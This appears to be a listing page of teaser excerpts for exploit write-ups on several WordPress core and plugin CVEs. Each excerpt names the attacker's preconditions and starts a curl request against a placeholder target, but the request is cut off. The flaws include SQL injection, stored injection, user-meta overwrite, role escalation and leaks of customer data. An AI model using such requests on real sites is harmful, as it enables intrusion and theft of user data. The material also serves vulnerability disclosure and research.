Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-63030: wordpress-develop

## The Exploit An unauthenticated attacker can perform SQL injection via the `author__not_in` parameter in any REST API endpoint that passes user input to `WP_Query`. The following curl request demonstrates the injection against the default `/wp/v2/posts` endpoint. ```bash curl...

GitHub

CVE-2026-0800

## The Exploit An unauthenticated attacker can submit a payload through the front-end post submission form and have it stored inside custom field output. ```bash # 1) store the payload via the front-end submission endpoint curl -sk -X POS...

Read article →
GitHub

CVE-2025-15516

## The Exploit Authenticated Subscriber-level users can abuse the plugin's AJAX callback to overwrite arbitrary string user meta on their own account. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application...

Read article →
GitHub

CVE-2025-15043

## The Exploit An authenticated WordPress user with subscriber-level access can invoke the custom tables migration AJAX action directly. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-form-ur...

Read article →
GitHub

CVE-2025-11924

## The Exploit The attacker needs no WordPress authentication; they only need to send a POST to the token endpoint with a `Referer` header pointing at any page that contains the Ninja Forms Submissions Table block. ```bash curl -i -s -X P...

Read article →
GitHub

CVE-2026-1051

## The Exploit Attacker needs a victim who is logged in to the target WordPress site. ```bash curl 'https://TARGET.EXAMPLE/' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'action=uc&u=123&e=victim%40example.com&nk=VI...

Read article →
GitHub

CVE-2025-15466

## The Exploit Attacker needs authenticated Contributor-level access or higher and a valid `FinalTiles_gallery` nonce from the plugin’s admin UI. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-ww...

Read article →
GitHub

CVE-2025-14351

## The Exploit Unauthenticated attackers can delete the plugin's local font cache simply by visiting the plugin admin page slug. ```bash curl -i -s 'https://target.example.com/?page=bsf-custom-fonts' -o /dev/null -w '%{http_code}\n' ``` ...

Read article →
GitHub

CVE-2025-14533

## The Exploit Unauthenticated attackers only need access to a front-end ACF Extended form where the `role` field is mapped to the user-registration action. ```bash curl -i -X POST "http://TARGET/?acf_form=submit" \ -H "Content-Type: ap...

Read article →
GitHub

CVE-2025-14075

## The Exploit Unauthenticated attackers can retrieve customer records by calling the exposed AJAX action with a valid publicly accessible nonce and a target email address. ```bash curl 'https://TARGET_DOMAIN/wp-admin/admin-ajax.php' \ ...

Read article →